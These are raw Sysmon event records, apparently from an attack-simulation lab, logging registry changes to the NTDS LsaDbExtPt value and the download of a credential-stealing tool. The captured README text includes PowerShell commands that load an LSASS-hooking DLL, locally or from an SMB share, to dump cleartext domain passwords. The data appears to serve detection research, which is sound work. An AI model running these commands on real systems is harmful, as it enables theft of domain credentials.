13241300x800000000000000030410422Microsoft-Windows-Sysmon/Operationalwin-host-mhaag-attack-range-117-SetValue2022-08-23 02:38:39.084{C2494F38-3DAE-6304-7E0C-000000006602}6096C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeHKLM\System\CurrentControlSet\Services\NTDS\LsaDbExtPtC:\Users\ADMINI~1\AppData\Local\Temp\2\lsass_lib.dllWIN-HOST-MHAAG-\Administrator 12241200x800000000000000030407303Microsoft-Windows-Sysmon/Operationalwin-host-mhaag-attack-range-117-DeleteValue2022-08-23 02:37:07.390{C2494F38-3D53-6304-600C-000000006602}3956C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeHKLM\System\CurrentControlSet\Services\NTDS\LsaDbExtPtWIN-HOST-MHAAG-\Administrator 13241300x800000000000000030406873Microsoft-Windows-Sysmon/Operationalwin-host-mhaag-attack-range-117-SetValue2022-08-23 02:36:59.600{C2494F38-3D4B-6304-5C0C-000000006602}8544C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeHKLM\System\CurrentControlSet\Services\NTDS\LsaDbExtPtC:\Users\ADMINI~1\AppData\Local\Temp\2\lsass_lib.dllWIN-HOST-MHAAG-\Administrator 12241200x800000000000000030406468Microsoft-Windows-Sysmon/Operationalwin-host-mhaag-attack-range-117-DeleteValue2022-08-23 02:36:53.911{C2494F38-3D45-6304-580C-000000006602}8984C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeHKLM\System\CurrentControlSet\Services\NTDS\LsaDbExtPtWIN-HOST-MHAAG-\Administrator 13241300x800000000000000030064068Microsoft-Windows-Sysmon/Operationalwin-host-mhaag-attack-range-117-SetValue2022-08-22 21:23:29.378{C2494F38-F3D1-6303-D700-000000006502}4584C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeHKLM\System\CurrentControlSet\Services\NTDS\LsaDbExtPtc:\temp\lsass_lib.dllWIN-HOST-MHAAG-\Administrator 12241200x800000000000000030063501Microsoft-Windows-Sysmon/Operationalwin-host-mhaag-attack-range-117-DeleteValue2022-08-22 21:23:20.065{C2494F38-F3C7-6303-D000-000000006502}4892C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeHKLM\System\CurrentControlSet\Services\NTDS\LsaDbExtPtWIN-HOST-MHAAG-\Administrator 13241300x800000000000000029877135Microsoft-Windows-Sysmon/Operationalwin-host-mhaag-attack-range-117-SetValue2022-08-22 20:18:30.692{C2494F38-4F6C-62FD-B90D-000000006302}5632C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeHKLM\System\CurrentControlSet\Services\NTDS\LsaDbExtPtc:\temp\lsass_lib.dllWIN-HOST-MHAAG-\Administrator 15241500x800000000000000029869588Microsoft-Windows-Sysmon/Operationalwin-host-mhaag-attack-range-117-2022-08-22 20:17:16.263{C2494F38-3D99-62FD-2B0B-000000006302}2664C:\Windows\Explorer.EXEC:\Users\Administrator\Downloads\LogonCredentialsSteal-master\LogonCredentialsSteal-master\lsass_lib\README.TXT2020-01-27 07:11:08.000MD5=45CF3AE26C0F27DA309A238097D42737,SHA256=7ED7DF78D862644779AE02A5732A0A5C00D9911E87615CE7AF3F848F2E4240EDLOCAL AND REMOTE HOOK msv1_0!SpAcceptCredentials from LSASS.exe and DUMP DOMAIN/LOGIN/PASSWORD IN CLEARTEXT to text file. run powershell v1.0 New-ItemProperty -Path HKLM:\SYSTEM\CurrentControlSet\Services\NTDS -Name LsaDbExtPt -Value "c:\temp\lsass_lib.dll" New-ItemProperty -Path HKLM:\SYSTEM\CurrentControlSet\Services\NTDS -Name LsaDbExtPt -Value "\\share\lulz\lsass_lib.dll" or To load our DLL, we can use a very simple Impacket Python script to modify the registry and add a key to HKLM\SYSTEM\CurrentControlSet\Services\NTDS\DirectoryServiceExtPt pointing to our DLL hosted on an open SMB share, and then trigger the loading of the DLL using a call to hSamConnect RPC call. look in remote_inject.py will inject lib and dump any logon credentials to c:\temp\credentials.txtWIN-HOST-MHAAG-\Administrator 15241500x800000000000000029869566Microsoft-Windows-Sysmon/Operationalwin-host-mhaag-attack-range-117-2022-08-22 20:17:16.232{C2494F38-3D99-62FD-2B0B-000000006302}2664C:\Windows\Explorer.EXEC:\Users\Administrator\Downloads\LogonCredentialsSteal-master\LogonCredentialsSteal-master\README.md2020-01-27 07:11:08.000MD5=2C8AF1CFD15B7941FF97470771F7AAB3,SHA256=017F23714E2D137C5097D32B531C0AE6388FAD40C8FA5EC22F841B0229D23AD6# LogonCredentialsSteal LOCAL AND REMOTE HOOK msv1_0!SpAcceptCredentials from LSASS.exe and DUMP DOMAIN/LOGIN/PASSWORD IN CLEARTEXT to text file. run powershell v1.0 New-ItemProperty -Path HKLM:\SYSTEM\CurrentControlSet\Services\NTDS -Name LsaDbExtPt -Value "c:\temp\lsass_lib.dll" New-ItemProperty -Path HKLM:\SYSTEM\CurrentControlSet\Services\NTDS -Name LsaDbExtPt -Value "\\\\share\lulz\lsass_lib.dll" or To load our DLL, we can use a very simple Impacket Python script to modify the registry and add a key to HKLM\SYSTEM\CurrentControlSet\Services\NTDS\DirectoryServiceExtPt pointing to our DLL hosted on an open SMB share, and then trigger the loading of the DLL using a call to hSamConnect RPC call. look in remote_inject.py will inject lib and dump any logon credentials to c:\temp\credentials.txt thanks https://ired.team/ for research WIN-HOST-MHAAG-\Administrator